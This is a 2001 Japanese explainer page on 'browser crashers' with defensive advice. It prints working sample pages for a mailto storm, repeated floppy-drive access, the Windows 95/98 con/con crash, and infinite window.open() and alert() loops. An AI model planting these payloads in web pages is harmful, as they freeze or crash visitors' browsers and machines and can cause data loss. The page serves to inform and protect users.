作成:2001-09-19

ブラウザクラッシャーについて



目次

1 ブラウザクラッシャーとは?
2 ブラウザクラッシャーの種類
	@mailtoストーム
	AFDアタック
	Bconconクラッシャー
	C無限ループ(JavaScript)
3 対策方法
	@危険なサイトに出入りしない
	AJavaScriptを無効にする
	Bチェッカーを使う
	Cソースを調べる
	
⇒トップページに戻る


1 ブラウザクラッシャーとは?

 ブラウザクラッシャー(BrowserCrasher)とは、閲覧者のマシンをハングアップさせたり、ブラウザをクラッシュさせる為にWebページに仕組まれるタグやスクリプトのことだ。 例えば、新しいWindowを次々と開くものや、入ってもいないFDドライブにアクセスし続けたりするものがある。 ブラウザクラッシャーの仕組まれたWebページにいくと、リソース不足でマシンがフリーズしたり、いきなり強制終了画面になったりする。

 ブラウザクラシャーはUG(アンダーグラウンド)系の掲示板で遭遇することが多い。悪意あるユーザーがブラウザクラッシャーへのリンクを張ったりするからだ。 また、アダルトサイトで広告が次々と表示されたりすることがあるが、これも一種のブラウザクラッシャーだと思う。

 マシンがハングアップした場合、 Alt + Ctrl + Del のコマンドで強制終了させるか、電源を切るしかない。 このときに、ファイルが壊れたりするなどしてマシンにダメージを与えてしまうことがある。

2 ブラウザクラッシャーの種類

 ここでは、基本的なブラウザクラッシャーについて簡単に解説する。 また、実際にインターネット上で使われるブラウザクラッシャーは、ここで紹介するものよりも遥かに強力な場合が多い。

@ mailtoストーム

 メールソフトを大量に起動させ、マシンをフリーズさせる。

 これには<IMG>タグを使用する。 <IMG>タグは画像を表示させるタグだが、SRC属性にmailto:XXX(XXXは任意)を指定することで、メールソフト(Outlook Expressなど)を起動させることができる。

ソース1■mailtoストーム
<HTML>
<BODY>

<IMG SRC="mailto:01">
<IMG SRC="mailto:02">
<IMG SRC="mailto:03">
<IMG SRC="mailto:04">
<IMG SRC="mailto:05">
<IMG SRC="mailto:06">
<IMG SRC="mailto:07">
<IMG SRC="mailto:08">
<IMG SRC="mailto:09">
<IMG SRC="mailto:10">
</BODY>
</HTML>

 上のソースは、10個のメーラーを起動させるものだ。 これが100個や200個になると、大抵のマシンはフリーズしてしまう。(ブラウザが強制終了される場合もある。)

A FDアタック

 ありもしないFD(フロッピーディスク)内のファイルにアクセスし続ける。 mailtoストームと同様に、<IMG>タグを使う。 <IMG>タグのSRC属性にfile:///a|/XXX(XXXは任意)と指定する。

ソース2■FDアタック
<HTML>
<BODY>

<IMG SRC="file:///a|/01.jpg">
<IMG SRC="file:///a|/02.jpg">
<IMG SRC="file:///a|/03.jpg">
<IMG SRC="file:///a|/04.jpg">
<IMG SRC="file:///a|/05.jpg">
<IMG SRC="file:///a|/06.jpg">
<IMG SRC="file:///a|/07.jpg">
<IMG SRC="file:///a|/08.jpg">
<IMG SRC="file:///a|/09.jpg">
<IMG SRC="file:///a|/10.jpg">
</BODY>
</HTML>

 上のソースは、FD内の01.jpg〜10.jpgにアクセスさせるものだ。(実際にそのようなファイルがあるかどうかは関係ない。) ただし、FDがAドライブであるマシンでないと効果がない。 この程度のことでマシンをフリーズさせることは出来ないが、FDDの起動音がうるさいので厄介だ。

B conconクラッシャー

 Windows95/98では、conprnnulauxなどのDOS時代にデバイスだった名前をフォルダ名やファイル名として扱うことが出来ない。 もし、c:\con\conなどの存在しないファイルにアクセスしようとするとOSがクラッシュする。

 この問題を利用して、<IMG>タグのSRC属性にfile:///c|/con/conなどと指定することでOSをクラッシュさせる。 それがconconクラッシャーだ。

ソース3■conconクラッシャー
<HTML>
<BODY>

<IMG SRC="file:///c|/con/con">
</BODY>
</HTML>


□参考

C 無限ループ(JavaScript)

 JavaScriptを使えば、Windowを開くなどの処理を繰り返して行うことが出来る。 当然、無限に繰り返す(無限ループ)こともできる。 ここでは、Windowやアラート(警告窓)を無限に開き続けるものを紹介しよう。

※ JavaScriptとは、Netscape社の開発したスクリプト言語で、HTML文書に直接記述することができる。 最近ではほとんどのブラウザがJavaScriptをサポートしている。

ソース4■Windowを無限に開き続ける
<HTML>
<BODY>

<SCRIPT>
for(;;) {
    window.open();
}
</SCRIPT>
</BODY>
</HTML>


ソース5■アラート(警告窓)を無限に開き続ける
<HTML>
<BODY>

<SCRIPT>
for(;;) {
    alert();
}
</SCRIPT>
</BODY>
</HTML>

3 対策方法

 誰にでもできる対策もあるが、ある程度HTMLやJavaScriptについての知識があることが望ましい。 また、ブラウザクラッシャーの仕組みを知っていることが重要だ。

@ 危険なサイトに出入りしない

 危険なサイト、特にUG系の掲示板などには出入りしない方が良い。 これは最も簡単で、かつ誰にでもできる対策だ。 特に、初心者はUG系のサイトにはいかない方が良いと思う。 ブラウザクラッシャー以外にも様々な危険性が伴うからだ。

A JavaScriptを無効にする

  ブラウザクラッシャーにはJavaScriptが使われていることがあるので、JavaScriptを無効にすればある程度の対策にはなる。 また、JavaAppletやActiveXも無効することを推奨する。 しかし、サイトによってはこれらの機能がないと正常に利用できないこともある。

B チェッカーを使う

 BrowserCrasherChecker(ブラウザクラッシャーチェッカー)を使えば、ブラウザ゙クラッシャーかどうかを判別できる。 ただし、この方法で全てのブラウザ゙クラッシャーが判別できる訳ではない。 また、誤診することもある。

ブラウザクラッシャーチェッカー

C ソースを調べる

 ページのURLの先頭に view-source: と付け加えれば、ページのソースを表示させることができる。 例えば、YAHOO!JAPANのページのソースを見るには view-source:http://www.yahoo.co.jp となる。 この方法を使えば、実際にリンクをクリックする前にリンク先が安全かどうかを調べられる。 ただし、HTMLやJavaScriptの知識が必要になる。 また、ブラウザクラッシャーの仕組みもある程度知っておく必要がある。


1